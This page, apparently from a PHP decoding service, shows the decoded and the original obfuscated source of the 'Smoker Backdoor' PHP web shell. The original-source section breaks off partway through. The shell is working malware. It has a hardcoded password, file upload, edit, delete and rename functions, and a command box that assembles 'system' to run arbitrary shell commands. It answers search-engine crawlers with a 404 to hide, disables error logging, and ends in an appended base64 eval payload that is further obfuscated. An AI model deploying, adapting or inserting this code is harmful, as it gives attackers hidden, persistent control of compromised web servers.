Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php // default password : smoker // Created By AnarchoXploit - Copyright - All Reser..

Decoded Output download

<?php 
 
// default password : smoker 
// Created By AnarchoXploit - Copyright - All Reserved 
// Coded By Afrizal F.A 
 
goto IGf0z; 
ZC0s9: 
?> 
<br><br> 
<form enctype="multipart/form-data" method="post">Upload : <input type="file" name="upd"><input type="submit" value="Upload"><?php 
goto ZyPkR; 
Vr3bF: 
if ( 
    preg_match( 
        $user_agent_block, 
        $_SERVER["HTTP_USER_AGENT"] 
    ) 
) { 
    header( 
        "HTTP/1.0 404 Not Found" 
    ); 
    die(); 
} 
goto mJSyl; 
dQBTm: 
@ini_set( 
    "max_execution_time", 
    0 
); 
goto JHj8n; 
lOv6W: 
if ($_GET["edit"] == "true") { 
    echo "<form enctype="multipart/form-data" method="post">
  <textarea style="width: 100%; height: 150px;" name="edit_file">" . 
        htmlspecialchars(file_get_contents($_GET["file"])) . 
        "</textarea>\xa  <br><br>\xa  File Name : <input type="text" name="nama_f" value="{$_GET["file"]}">
  <br><br>\xa  <input type="submit" value="Save File">\xa  </form>
  "; 
    if ($_POST["edit_file"]) { 
        unlink($_GET["file"]); 
        $fedit = fopen($_POST["nama_f"], "w"); 
        if (fwrite($fedit, $_POST["edit_file"])) { 
            fclose($fedit); 
            echo "<script>alert('Edit File Success !!!'); window.location = '?file={$_POST["nama_f"]}';</script>"; 
        } else { 
            echo "<script>alert('Edit File Failed !!!'); window.location = '?file={$_POST["nama_f"]}';</script>"; 
        } 
    } 
} 
goto nC2z9; 
ZyPkR: 
if ($_FILES["upd"]) { 
    if ( 
        copy( 
            $_FILES["upd"]["tmp_name"], 
            $dir . "/" . $_FILES["upd"]["name"] 
        ) 
    ) { ?> 
	<b>Uploaded</b><?php } else { ?> 
	<b>Failed Upload</b><?php } 
} 
goto KXVBV; 
atZEc: 
if (isset($_REQUEST["logout"])) { 
    session_destroy(); 
    header("Location: ?"); 
} 
goto lfZoy; 
AMgqQ: 
?> 
	</textarea><br><br> 
	<center><?php 
 goto rMQn7; 
 kYHPh: 
 foreach ($exp as $x => $dirx) { 
     if (empty($dirx)) { 
         continue; 
     } 
     $do .= "/<a href='?d="; 
     for ($i = 0; $i <= $x; $i++) { 
         $do .= $exp[$i] . "/"; 
     } 
     $do .= "'>{$dirx}</a>"; 
 } 
 goto fyV16; 
 rMQn7: 
 if ($_GET["file"]) { 
     if ( 
         !$_GET["edit"] && 
         !$_GET["delete"] && 
         !$_GET["rename"] && 
         !$_GET["rmfolder"] 
     ) { 
         echo "<textarea style="width: 100%; height: 150px; color: aqua;">" . 
             htmlspecialchars(file_get_contents($_GET[file])) . 
             "</textarea>"; 
     } 
 } 
 goto lOv6W; 
 Q1OFe: 
 if ($_GET["d"]) { 
     $dir_raw = $_GET["d"]; 
     chdir($_GET["d"]); 
 } else { 
     $dir_raw = str_replace("\", "/", getcwd()); 
 } 
 goto rZ9OS; 
 NJzU0: 
 ?> 
	</center><br><br>Path :<?php 
 goto q0OgI; 
 q0OgI: 
 echo $do; 
 goto ZC0s9; 
 BpERn: 
 $passwd = "smoker"; 
 goto YELWk; 
 YELWk: 
 if ($_POST["pass"]) { 
     if ($_POST["passwd"] == $passwd) { 
         $_SESSION["enter"] = "enter"; 
         header("Location: ?"); 
     } 
 } 
 goto atZEc; 
 C9PUH: 
 if ($_GET["delete"] == "true") { 
     if (unlink($_GET["file"])) { 
         echo "<script>alert('File Deleted !!!'); window.location = '?';</script>"; 
     } else { 
         echo "<script>alert('This File is Failed Delete !!!'); window.location = '?';</script>"; 
     } 
 } 
 goto CrbOW; 
 ZgZvC: 
 ?> 
	<html> 
 
		<head> 
			<title>Smoker Backdoor</title> 
			<link href="https://i.screenshot.net/z7xj4fg" rel="icon"> 
			<style> 
				html { 
					background: url(https://wallup.net/wp-content/uploads/2016/01/245263-space-smoke-men-748x421.jpg); 
					background-size: cover; 
					background-color: #000; 
					background-repeat: no-repeat; 
					background-position: center; 
					background-attachment: fixed; 
					color: #fff 
				} 
 
				a { 
					text-decoration: none; 
					color: #0ff 
				} 
 
				tr:hover { 
					background: #fff; 
					color: #000 
				} 
 
				tr:hover a { 
					text-decoration: none; 
					color: #000 
				} 
 
				input { 
					background: 0 0; 
					color: #0ff; 
					border: 1px solid #fff 
				} 
 
				textarea { 
					background: 0 0; 
					color: #fff 
				} 
			</style> 
		</head> 
 
		<body> 
			<center> 
				<font style="color:#0ff" size="10">Smoker Backdoor</font><br><br>Kernel :<?php 
    goto PeYM6; 
    HRIz1: 
    @clearstatcache(); 
    goto pHFGp; 
    IGf0z: 
    error_reporting(0); 
    goto HRIz1; 
    KXVBV: 
    ?> 
</form> 
<center>[ <a href="?">Home Directory</a> ] [ <a href="?logout=true">Log Out</a> ]</center> 
<form enctype="multipart/form-data" method="post"> 
	<font style="color:#0ff">{WebShell}</font> -> <input name="0"><input type="submit" value=">"> 
</form><textarea style="width:100%;height:150px;color:#0ff"><?php 
goto lsrW5; 
LHFAC: 
$user_agent_block = 
    "/Google|WhatsApp|Telegram|bing|Bing|yahoo|Yahoo|MSNBot|Slurp|PycURL|facebook|ia_archiver|crawler|Yandex/"; 
goto Vr3bF; 
pHFGp: 
@ini_set("error_log", null); 
goto IRFkd; 
R6GhI: 
@ini_set("display_errors", 0); 
goto LHFAC; 
lfZoy: 
if (empty($_SESSION["enter"])) { ?> 
<html><head><title>Smoker Backdoor</title><link href="https://i.screenshot.net/z7xj4fg"rel="icon"><style>html{background:url(https://wallup.net/wp-content/uploads/2016/01/245263-space-smoke-men-748x421.jpg);background-size:cover;background-color:#000;background-repeat:no-repeat;background-position:center;background-attachment:fixed;color:#fff}input{background:0 0;color:#0ff;border:1px solid #fff}</style></head><body><table width="100%"height="100%"><td align="center"><font style="color:#0ff"size="10">Smoker Backdoor</font><br><br>Smoking, Like Exploring The Universe<br><br><form enctype="multipart/form-data"method="post"><input type="password"name="passwd"> <input type="submit"name="pass"value="Login"></form></td></table></body></html><?php die();} 
goto Q1OFe; 
PeYM6: 
echo php_uname(); 
goto NJzU0; 
sVxIA: 
if ($_GET["rmfolder"] == "true") { 
    if (rmdir($_GET["folder"])) { 
        echo "<script>alert('Folder Deleted !!!'); window.location = '?';</script>"; 
    } else { 
        echo "<script>alert('This Folder is Failed Delete !!!'); window.location = '?';</script>"; 
    } 
} 
goto C9PUH; 
lsrW5: 
if ($_POST["0"]) { 
    echo htmlspecialchars( 
        ($_[0][] = @$_POST["0"]) . 
            ($_[1][] = "s") . 
            ($_[1][] = "y") . 
            ($_[1][] = "st") . 
            ($_[1][] = "em") . 
            ($l = @get_defined_vars()["_"][1]) . 
            ($ .= $l[0]) . 
            ($ .= $l[1]) . 
            ($ .= $l[2]) . 
            ($ .= $l[3]) . 
            $("{$_[0][0]}") 
    ); 
} 
goto AMgqQ; 
mJSyl: 
session_start(); 
goto BpERn; 
nC2z9: 
if ($_GET["rename"] == "true") { 
    echo "<form enctype="multipart/form-data" method="post">\xa  " . 
        htmlspecialchars($_GET["file"]) . 
        " [ To ] <input type="text" name="rename_file">
  <input type="submit" value="Rename">\xa  </form>\xa  "; 
    if ($_POST["rename_file"]) { 
        if ( 
            rename( 
                $_GET["file"], 
                $_POST["rename_file"] 
            ) 
        ) { 
            echo "<script>alert('Success Renamed !!!'); window.location = '?';</script>"; 
        } else { 
            echo "<script>alert('Failed Renamed !!!'); window.location = '?';</script>"; 
        } 
    } 
} 
goto sVxIA; 
IRFkd: 
@ini_set("log_errors", 0); 
goto dQBTm; 
JHj8n: 
@ini_set("output_buffering", 0); 
goto R6GhI; 
CrbOW: 
if (empty($_GET["file"])) { ?> 
<table width="100%"><tr><th class="c"style="border:1px solid #fff">Name File</th><th class="c"style="border:1px solid #fff"colspan="2">Action</th></tr><?php 
$scndir = scandir($dir); 
foreach ($scndir as $sdir) { 
    if (is_dir($dir . "/" . $sdir)) { 
        echo "<tr>
      <td><a href='?d={$dir}/{$sdir}'><img height='20' src='http://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/folder-icon.png'/> " . 
            htmlspecialchars($sdir) . 
            "</a></td>\xa      <td><a href='?file={$dir}/{$sdir}&rename=true'>Rename</a></td>
      <td><a href='?folder={$dir}/{$sdir}&rmfolder=true'>Delete</a></td>\xa      </tr>\xa      "; 
    } 
    if (is_file($dir . "/" . $sdir)) { 
        echo "<tr>
      <td><a href='?file={$dir}/{$sdir}'><img height='20' src='http://icons.iconarchive.com/icons/zhoolego/material/512/Filetype-Docs-icon.png'/> " . 
            htmlspecialchars($sdir) . 
            "</a></td>
      <td><a href='?file={$dir}/{$sdir}&edit=true'>Edit</a></td>
      <td><a href='?file={$dir}/{$sdir}&delete=true'>Delete</a></td>
      </tr>
      "; 
    } 
} 
?> 
</table><?php } 
goto l2jq8; 
fyV16: 
if ($_GET["d"]) { 
    $dir = $_GET["d"]; 
} else { 
    $dir = getcwd(); 
} 
goto ZgZvC; 
rZ9OS: 
$exp = explode("/", $dir_raw); 
goto kYHPh; 
l2jq8: 
?> 
</center><br><div style="padding:10px;border:1px solid #fff;color:#0ff;text-align:center">Smoker Backdoor</div></body></html> 
 
<?php $A9zE1Agm="base64_decode";eval($A9zE1Agm("JFBBazZPZFlKWD0iNWM4ZGM3MjMxZjg4NjRhMzllOWYzOWU0YTZjMWY4MWIiOyRLTm0ybzg5YW00PWFycmF5KCk7JEtObTJvODlhbTRbMF09IklEOCtQZTRkYTNiN2ZiYmNlMjM0NWQ3NzcyYjA2NzRhMzE4ZDVEOXdhSEFnSkVsUE9WSnZaRWgyUFNKY2VEWXlYREUwTVZ4NE56TmNlRFkxWEhnek5seDRNelJjZURWbVhERTBORnd4TkRWY2VEWXpYSGcyWmx4NE5qUmNNVFExSWp0bGRtRnNLQ1JKVHpsU2IyUklkaWdpU2tkS2JsTnROWEJrYmxwQ1ZYb3dhVTVYVFRSYVIwMHpUV3BOZUZwcVp6Uk9hbEpvVFhwc2JFOVhXWHBQVjFVd1dWUmFhazFYV1RSTlYwbHBUM2xTUlZkSFdtaGxWVlpyVmtSa1FsQlhSbmxqYlVZMVMiOyRLTm0ybzg5YW00WzFdPSIwTnJOMHBGVWM5ZjBmODk1ZmI5OGFiOTE1OWY1MWZkMDI5N2UyMzZkbGxhYlVZMVVsZFNWVTR3Um1KTlJqQTVTV3RzUlU5RGRGRmFWRkpyV1ZST2FVNHlXbWxaYlU1c1RXcE5NRTVYVVROT2VtTjVXV3BCTWs1NlVtaE5la1UwV2tSV1JVOVlaR2hUUlVadVVUSnNVMkZYU1hwVmJGWnBUVzVTYzFsdGJFSlBWV3hFV1hwS1RtVnRaRFZVYm5CS1pXc3hObEZVUWxCaE1GcERWV3BKYVU5NVVrVlhSMXBvWlZWV2ExWkVaRUpYZWtaa1VGTktUMUV4WkhGVFZGWm9Va2ROTlZwcVFtIjskS05tMm84OWFtNFsyXT0iMVBSR3N4VzhmMTRlNDVmY2VlYTE2N2E1YTM2ZGVkZDRiZWEyNTQzbTFKTlU5SFJtbFBWRVV4VDFkWk1VMVhXbXROUkVrMVRqSlZlVTE2V210YWVsSnNVbFZ3VkZwWE1VZFNiRTEzVjJ4R1RtVnJTblZXVlZwM1lVVjRXV0pITVdwTk1uaERXV3hhYjFWcmNEWmpNbVJFWVZaS2NVbHFjMnRTUm1odFdWaHNSbHBHVVROUlZuTjVXRlF3YVZsVlpFZE5SazVXVlZSb2JVMVVVbXhPUkZadFdUSldiRmxVUlRKT01rVXhXVlJOTWxwSFZtdGFSRkpwV2xkRmVVNVVVWHBhTVVKVVVWYyI7JEtObTJvODlhbTRbM109IjFUYzgxZTcyOGQ5ZDRjMmY2MzZmMDY3Zjg5Y2MxNDg2MmMxWkhaRFpVYlhCdVRVVXhSVkpVVGs1aFYwMHpVMVZHZGxvd1RuQlZibVJxWWxScmQxbHFTazlrYlVwRVVWUnNTbEo1U1RkS1JWSlpXbTFHTlZKWFVsVk9NRVppVFRFd09VbHRlRFpaZW1kNFdsUmplVTlIVVRWYVJGSnFUVzFaTWsxNldtMU5SRmt6V21wbk5Wa3lUWGhPUkdjeVRXMU9hazFzV1hkVE1FNVRXbXhWZDFac1RsZGhNVnBVVmpOc2ExTldXa2RWYkVaV1pWZFNhMU14VGtKaVZYQndVVmQwV1UxVk5VZFciOyRLTm0ybzg5YW00WzRdPSJWM2hlY2NiYzg3ZTRiNWNlMmZlMjgzMDhmZDlmMmE3YmFmM2hVbXhXYzJNeU5HbFBlVkpGVjBkYWFHVlZWbXRXUkdSQ1YzcFNaRkJUU2xSU2JFcHNXVEpPYVZsNlp6TmFWRkpwVGxkT2JFMXRXbXhOYW1kNlRVUm9iVnBFYkcxTmJVVXpXVzFHYlUweFZsWlNhekYxVjBaT1FrOVdRbFZOUjJSTFRXcHNNVk51YkVKTU1HeEVVMjA1YTFOR1NqTlpNM0IyWkd0NE5WTlhaRkJoVlVad1dWVm9VMDFIVGtWSmFuTnJVa1pvYlZsWWJFWmFSbEV6VVZaek1WaFVNR2xpTWswd1dUSkZNIjskS05tMm84OWFtNFs1XT0iRWM0Y2E0MjM4YTBiOTIzODIwZGNjNTA5YTZmNzU4NDliMXFUVFJaVkVKcFQxUkplazlFU1hkYVIwNXFUbFJCTlZsVVdtMU9lbFUwVGtSc2FXUnJlRFZUVkdSS1VWYzVjbGxWWXpWbGJWSkVVVlJzU2xFeFNtMVdWRUpYVlRGYWNsWnNUbGhsVjFKS1ZtdGFVMVZXWjNkaFJrSldUVlpHZFZkR1VucGFlVWszU2tWU1dWcHRSalZTVjFKVlRqQkdZazVzTURsSmEwNXdWVzV3V2swd2NIZFplbXh0VFVkWk5FOVVWbTFaYW1zMFdWZEpOVTFVVlRWYWFsVjRXbTFSZDAxcWF6TmFWRSI7JEtObTJvODlhbTRbNl09Imw2VG0xU2FsYzlmMGY4OTVmYjk4YWI5MTU5ZjUxZmQwMjk3ZTIzNmROR1JtNVZSazVDWVRGbmVGUnJXbFppUm5CSFZsZDRlbUpzVmtaaFJrWlpUVlUxUjFaRlZscGliR2hWWXpKa1JHRlZSa3hUYTJOcFQzbFNSVmRIV21obFZWWnJWa1JrUWxkNlpHUlFVMHBoWTBkS1NGWnNXbFpoTWswMVdtcENiVTlFYXpGYWJVazFUMGRHYVU5VVJURlBWMWt4VFZkYWEwMUVTVFZPTWxWNVRYcGFhMlF5WkZGVk1FWnlXVEJvUzJSdFVraFBWM0JwVFc1a2JsUkhiRUpoTWtaSVQxaHdhMUUiOyRLTm0ybzg5YW00WzddPSJ3UmpGVFZVNWM5ZjBmODk1ZmI5OGFiOTE1OWY1MWZkMDI5N2UyMzZkVFpXeHJlbE51UW1wVFJrVXpTV3B6YTFKR2FHMVpXR3hHV2taUk0xRldjelJZVkRCcFUxVkdkbG93VG5CTlZGa3pUMVJCTlUxWFRURlpWR2MwVFVkYWFGcHFXbTFaYWxac1RtcEJORTR5Vm1sTlYwbDVXa2RPVTAxR2NGaGxSM2hoVFRCd2IxbHNWa2RWVms1VVVWUnNTbEV5VW5aYVJXaFRaREpPTm1JeldrMU5hMW96V1ZaTk1VMUdjRmhsUjNoaFRYbEpOMHBGVWxsYWJVWTFVbGRTVlU0d1JtSlBWakE1IjskS05tMm84OWFtNFs4XT0iU1d0d2IxMTY3OTA5MWM1YTg4MGZhZjZmYjVlNjA4N2ViMWIyZGNsc1RtaFBSR1J0V21wWk0wOVhSWGxhYWs1c1RucEdhMDlVUlRSTlYwVXlUakpKTTA1VVVYbE5WRWw1V1hwV01sa3lNV3BrYkd4MFQxUkNTMlZWUmpGVFZVNVRZVmRKZWxWc1ZtbE5ibEp6V1cxc1FtUlZiRVJaTTFwcVRXeGFNVmRyVlhoaVIwMTZWRzFuYVU5NVVrVlhSMXBvWlZWV2ExWkVaRUpYZWtWM1dGUXdhVmRxU2xaYVYwNXFXVzFOTkU0eVZUQlphbFpxV2xSS2JWcFVTVFJOZWtFMFdtMVJOVnBxUyI7JEtObTJvODlhbTRbOV09Im1oT01hODdmZjY3OWEyZjNlNzFkOTE4MWE2N2I3NTQyMTIyY2twb1dtcE9kVlF6YkVKVE1IQklUVmQ0YWswd05XOVhha3BXV2pGQ1ZGRlhOVk5pVjNoNlYyeE9RMkZHY0VoVmJteGhWMFUxTmxReWJFSmlhMnhFVGtka1MxSjVTVGRLUlZKWldtMUdOVkpYVWxWT01FWmlUVlJHWkZCVFNtRmpSMHBJVm14YVZtRXpZekJPVjAwd1QwZE9hbHBVU214TmJWRXpXbTFLYTFwWFJYaFpWMXBxVGxSR2FrNHlUVEpaVjFGNVRtcGtTbEZYT1c1Uk1teFRZVzFHUkZGVWJFcFNNRFI0V1QiOyRLTm0ybzg5YW00WzEwXT0iSXhOZWNjYmM4N2U0YjVjZTJmZTI4MzA4ZmQ5ZjJhN2JhZjNGcHRSbGhPV0VKclVUSmtjbHBGWkZkak1YQllXa2hzV2xaNlJrTkphbk5yVWtab2JWbFliRVphUmxFelVWWnplRTFzTURsSmJGWkdZVE5DVUdWVlJreFhWRkV4V1hwUk5Ga3lUbXhOYlZWNVdrUmtiVmx0VW14WlZFWm9XbTFOTVUxWFRUTlplbHBvV2tSSk1rMHhXalZaYTFrMVpXeHdXVlZ1V21wVFJrWjJVMnRrVDJJd2VFUlJhMUpYVm10d1RsWkVSa05XVm1kNFVXeENWazFXUm5wVFZWRnBUM2xTUlZkSFdtaCI7JEtObTJvODlhbTRbMTFdPSJsVlZaclZrUms0NWM0OGNjZTJlMmQ3ZmJkZWExYWZjNTFjN2M2YWQyNlFsZDZSWHBZVkRCcFVsaENVRnBYVG1wWmJVMDBUakpWTUZscVZtcGFWRXB0V2xSSk5FMTZRVFJhYlZFMVdtcEthRTR5U21oYWFrNDFVVlYwV2sweFdqVlphMWsxWld4d1dWVnVXbXBUUmtaMlUydGtUMkl3ZUVSUmExSlhWbXR3VGxaRVJrTldWbWQ0VVd4Q1ZrMVdTa2hWTVZaWFZGTkpOMHBGVWxsYWJVWTFVbGRTVlU0d1JtSk5WRkprVUZOS1UxSnJNWHBUVldSdlRVZFJNRTVYVFRCUFIwNXFXbFJLIjskS05tMm84OWFtNFsxMl09ImJFMXRVVE5hYjQ1YzQ4Y2NlMmUyZDdmYmRlYTFhZmM1MWM3YzZhZDI2VXByV2xkRmVGbFhXbXBPVkVacVRqSk5NbGxYVVhsT2EyaERXbXhzZFZadVFtbFNNVXB0V1RGb1YySkhUblZoTWpsYVYwVndOVmRXYUhKaU1HOTVWRzA1V2xkR1NtMVpWbVJTWW10c1JVbHFjMnRTUm1odFdWaHNSbHBHVVROUlZuTjRUbFl3T1VscVFYSlRWVTVvVDBSa2JWcHFXVE5QVjBWNVdtcE9iRTU2Um10UFZFVTBUVmRGTWs0eVNUTk9WRkY1VFZSSmVWa3hTbkZaVldSSFRVWk9WbFZZVGtwUk0iOyRLTm0ybzg5YW00WzEzXT0ibEYzZWNjYmM4N2U0YjVjZTJmZTI4MzA4ZmQ5ZjJhN2JhZjNWMnhvYjAxRmNEVlJWR3hSWVZWR2NsbHNaRmRsYlUxNVVtMDFZVlV5ZEhkVE1WSjZXakJPZEZScVJXbFBlVkpGVjBkYWFHVlZWbXRXUkdSQ1YzcEZNbGhVTUdsWk1qRTBXbTFOZVUxVVdUTlBWRUUxVFZkTk1WbFVaelJOUjFwb1dtcGFiVmxxVm14T2FrRTBUakpXYVUxWFNYbGFSMDVYVFVkSmVsRnFRa3hSTVVweFdWVk9NMW94UlhoV2JFNVZVbFJzVWxacldUVlZNVXBYVld4YVZtRjZWbFpXVjNSSFZERlZkMSI7JEtObTJvODlhbTRbMTRdPSJkcldsWmhVMGs0NWM0OGNjZTJlMmQ3ZmJkZWExYWZjNTFjN2M2YWQyNjNTa1ZTV1ZwdFJqVlNWMUpWVGpCR1lrMVVaR1JRVTBveldYcFNhbGxVVVhsTmVtaG9UVWRKTlUxcVRUUk5ha0pyV1RKTk1VMUViR2hPYlZrelRsUm5NRTlYU201YVJXaExUVlp3VkdGNlpFcFJXRUp4V2tab1MyTXhaM3BVYlhoclVucHNNMXBGVG01aE1XdDVXak5PU2xKVk5WZFdWM1EwVlVaV1IxVnRXbFpOVlRWT1NXcHphMUpHYUcxWldHeEdXa1pSTTFGV2MzaFBSakE1U1d4bmVGZHJXbFpoTW5oIjskS05tMm84OWFtNFsxNV09IklXWHBhODdmZjY3OWEyZjNlNzFkOTE4MWE2N2I3NTQyMTIyY3NiVTFIV1RSUFZGWnRXV3ByTkZsWFNUVk5WRlUxV21wVmVGcHRVWGROYW1zeldsUkplazV0VWxoV2EwcEhWV3hhU21Nd2JFaFhiV2hwVTBVMWMxTXhVbnBhTUU1d1VWVjBTMU5GY0hOWmVrNVhZekpTUkZGVWJFcFNNRFI0V1RJd2FVOTVVa1ZYUjFwb1pWVldhMVpFWkVKWGVrVTFXRlF3YVdWSFdtRlhSMmh6VjFoc2JtRXhhM2xhTTBKUVpWVkdURmRVVGxkbFYwcEhUMWR3YVZKNmJEWlhiRTV1WVRGcmVWb3oiOyRLTm0ybzg5YW00WzE2XT0iUWxCbFZVMTY3OTA5MWM1YTg4MGZhZjZmYjVlNjA4N2ViMWIyZGNaTVZVaHZNRTlHUVhwUmJUbHFVVEJGT1VscWMydFpiRlY1VFVSSmVrMUVZM2hOUkVFelRrUkZNRTlFTUdsWVNHY3lUV3gzZUU1RVJtTmxSR042V0Vobk1rNVdlRFJOZWxwalpVUk5NRmhJWnpGYWJIZDRUa1JTWTAxVVVURllTR2N5VFRGNE5FNXRXbU5sUkZrd1dFUkZNRTVUU1RkS1JrNU9ZVVJKZDAxcVRYZE9la1YzVFVSak1FMVVVVFJKUkRCblUxUkthV013VWxkTmEzTjVUVVJKZWsxRVkzaE5SRUV6VCI7JEtObTJvODlhbTRbMTddPSJrYzRjYTQyMzhhMGI5MjM4MjBkY2M1MDlhNmY3NTg0OWJSRk1FOURaMnRTUm1odFdWaHNSbHBHVVROUlUzZHJXVzFrUzJKdGJESmthMFpVUzFSMGJXUlhOV3BrUjJ4MlltbENTazF0U25wU1JsbDVVM3BKZDAxcVRYZE9la1YzVFVSak1FMVVVVFJMUTFKb1dsTjNhMkV5VmpWTFUwSTNTVU5TYUdSRU1XaGpia3BvWlZObmNFOTVRbTFpTTBsblMwTlNjRkJVUVRkSlExSndTVVIzWjJNelVubGlSMVoxUzBOU2NscFlhM0JQZVVGcllWTnpja3RUUWpkSlIyeHRTVU5vY0dKdVVqIjskS05tMm84OWFtNFsxOF09IkpaVjNkdlNrYzlmMGY4OTVmYjk4YWI5MTU5ZjUxZmQwMjk3ZTIzNmRkMGJHVldjMnRoVmpCd1VHcEJjRWxJYzJkS1IwWXdWM2xTY0ZoVU1HdGhNbFkxVjNsU2NGaFVjMmRtVTBJNVNVTlNhR1JFTVdoamJrcG9aVlk1TWxsWGVERmFXRTF2U2tkR01FdFVjMmRLU0U0d1kyb3dhVWxxYzJkYWJUbDVTVU5uYTJGVU1IZFBlVUZyWVZOQk9FbEhUblprVnpVd1MwTlNhRnBUYXpkSlExSndTM2x6Y0VsSWMyZGhWMWxuUzBOU2NGQkRRbXBpTTFaMVpFTm5hMWxYVlhCTVZFVndTVU4iOyRLTm0ybzg5YW00WzE5XT0iU2VtUklTWFZRV0U0d1kydzVlVnBZUW5OWlYwNXNTMGN4YTA1VFoydFpXRkppU2tkc1pFdFRkMmRKYVVselNVTlNhRnBXYzJ0aFZqQndUM2xDYkdKSVRteEpRMUo2WkVoSmRWQlRVbWhhVm5OcllWWXdOMGxJTUdkamJWWXdaRmhLZFVsRFVucGtTRWszU1VneGJHUnRSbk5MUTFKcFZsUkpkMDFxVFhkT2VrVjNUVVJqTUUxVVVUUkxRMUpVVkZkbmVVMUVTWHBOUkdONFRVUkJNMDVFUlRCUFEydHdUM2M5UFNJcEtUc2dQejRLUEQ5d2FIQWciOyRjazIwMjMwNzEwMDc0NTI5PSJceDYyXDE0MVx4NzNceDY1XHgzNlx4MzRceDVmXDE0NFwxNDVceDYzXHg2Zlx4NjRcMTQ1IjskemdsMjAyMzA3MTAwNzQ1MjkgPSBSa29TOGhBNTIwMjMwNzEwMDc0NTI5KCRLTm0ybzg5YW00LCRQQWs2T2RZSlgpO2Z1bmN0aW9uIFJrb1M4aEE1MjAyMzA3MTAwNzQ1MjkoJGFlLCRrZXkpIHsgJGF0PWFycmF5KCk7IGZvciAoJGk9MDsgJGkgPCBzdHJsZW4oJGtleSk7ICRpKyspIHsgaWYgKGludHZhbCgka2V5WyRpXSk+MCkgeyAkYXRbJGldPSRrZXlbJGldOyB9IH0gJGF0PWFycmF5X3ZhbHVlcygkYXQpOyAkc3RyPSIiOyBmb3IgKCRpPTA7ICRpIDwgY291bnQoJGFlKTsgJGkrKykgeyBpZiAoJGk8IGNvdW50KCRhZSktMSkgJHN0ci49c3RyX3JlcGxhY2UobWQ1KCRhdFskaV0pLCAiIiwgJGFlWyRpXSk7IGVsc2UgJHN0ci49JGFlWyRpXTsgfSByZXR1cm4gJHN0cjsgfWV2YWwoJGNrMjAyMzA3MTAwNzQ1MjkoJHpnbDIwMjMwNzEwMDc0NTI5KSk7")); ?>

Did this file decode correctly?

Original Code

<?php

// default password : smoker
// Created By AnarchoXploit - Copyright - All Reserved
// Coded By Afrizal F.A

goto IGf0z;
ZC0s9:
?>
<br><br>
<form enctype="multipart/form-data" method="post">Upload : <input type="file" name="upd"><input type="submit" value="Upload"><?php
goto ZyPkR;
Vr3bF:
if (
    preg_match(
        $user_agent_block,
        $_SERVER["\x48\x54\124\x50\137\125\x53\x45\122\137\x41\107\105\x4e\124"]
    )
) {
    header(
        "\x48\x54\124\x50\57\61\56\60\40\64\x30\x34\40\x4e\157\x74\x20\106\x6f\x75\156\x64"
    );
    die();
}
goto mJSyl;
dQBTm:
@ini_set(
    "\155\141\x78\137\x65\170\145\x63\165\164\x69\x6f\x6e\x5f\164\x69\x6d\145",
    0
);
goto JHj8n;
lOv6W:
if ($_GET["\x65\x64\x69\x74"] == "\x74\162\x75\x65") {
    echo "\x3c\146\x6f\162\x6d\40\x65\x6e\143\164\x79\x70\145\x3d\42\x6d\x75\154\x74\151\160\141\162\164\57\x66\x6f\x72\x6d\x2d\144\x61\x74\x61\42\x20\x6d\145\x74\150\157\x64\x3d\42\x70\157\x73\164\42\76\12\x20\x20\x3c\x74\x65\x78\x74\x61\162\145\141\40\163\x74\171\x6c\145\x3d\42\167\x69\x64\x74\150\x3a\x20\x31\x30\60\45\x3b\x20\150\x65\151\x67\150\164\x3a\x20\x31\65\x30\x70\x78\x3b\x22\x20\x6e\x61\155\145\x3d\42\145\x64\x69\164\137\x66\x69\x6c\x65\x22\x3e" .
        htmlspecialchars(file_get_contents($_GET["\x66\151\154\x65"])) .
        "\74\57\164\145\170\x74\141\162\145\141\x3e\xa\40\x20\74\x62\x72\x3e\74\x62\x72\x3e\xa\40\x20\106\x69\x6c\x65\40\116\141\155\x65\x20\x3a\40\x3c\151\x6e\x70\x75\164\40\x74\171\x70\145\75\42\164\145\x78\164\x22\40\x6e\x61\155\x65\x3d\x22\156\141\155\x61\137\146\42\x20\x76\x61\154\165\145\x3d\x22{$_GET["\146\151\154\145"]}\x22\76\12\40\40\74\x62\x72\76\x3c\x62\162\76\xa\x20\x20\74\151\x6e\x70\165\164\x20\x74\171\160\x65\75\x22\x73\x75\x62\155\x69\x74\42\x20\x76\x61\154\x75\145\x3d\x22\123\x61\166\x65\40\106\x69\154\145\x22\76\xa\x20\x20\x3c\57\146\x6f\x72\155\x3e\12\40\40";
    if ($_POST["\145\144\151\164\x5f\146\x69\x6c\x65"]) {
        unlink($_GET["\146\151\x6c\x65"]);
        $fedit = fopen($_POST["\156\141\x6d\141\137\x66"], "\167");
        if (fwrite($fedit, $_POST["\x65\x64\151\164\x5f\146\x69\x6c\x65"])) {
            fclose($fedit);
            echo "\x3c\x73\143\162\151\160\164\76\141\x6c\x65\x72\164\50\47\x45\x64\x69\164\x20\x46\151\x6c\145\40\x53\165\143\x63\x65\163\163\x20\x21\41\41\47\51\x3b\40\167\x69\x6e\x64\157\167\x2e\154\157\x63\141\164\x69\x6f\156\40\75\40\47\x3f\x66\151\x6c\x65\75{$_POST["\x6e\141\155\141\x5f\x66"]}\x27\x3b\74\57\x73\143\162\x69\x70\164\x3e";
        } else {
            echo "\x3c\x73\143\x72\151\x70\x74\76\141\154\145\x72\x74\x28\x27\105\144\x69\164\x20\x46\x69\x6c\x65\x20\106\141\151\154\x65\144\40\41\41\41\47\x29\73\x20\x77\x69\x6e\144\x6f\167\56\x6c\x6f\143\141\164\x69\157\x6e\x20\x3d\x20\47\x3f\x66\151\x6c\145\75{$_POST["\x6e\141\x6d\141\x5f\146"]}\47\x3b\x3c\x2f\163\143\162\x69\160\x74\76";
        }
    }
}
goto nC2z9;
ZyPkR:
if ($_FILES["\165\160\x64"]) {
    if (
        copy(
            $_FILES["\x75\160\144"]["\x74\155\x70\x5f\x6e\x61\x6d\145"],
            $dir . "\57" . $_FILES["\165\160\x64"]["\156\x61\155\x65"]
        )
    ) { ?>
	<b>Uploaded</b><?php } else { ?>
	<b>Failed Upload</b><?php }
}
goto KXVBV;
atZEc:
if (isset($_REQUEST["\154\157\x67\157\x75\x74"])) {
    session_destroy();
    header("\114\x6f\x63\141\x74\151\x6f\156\72\40\77");
}
goto lfZoy;
AMgqQ:
?>
	</textarea><br><br>
	<center><?php
 goto rMQn7;
 kYHPh:
 foreach ($exp as $x => $dirx) {
     if (empty($dirx)) {
         continue;
     }
     $do .= "\57\x3c\x61\40\x68\162\x65\x66\x3d\47\x3f\144\75";
     for ($i = 0; $i <= $x; $i++) {
         $do .= $exp[$i] . "\57";
     }
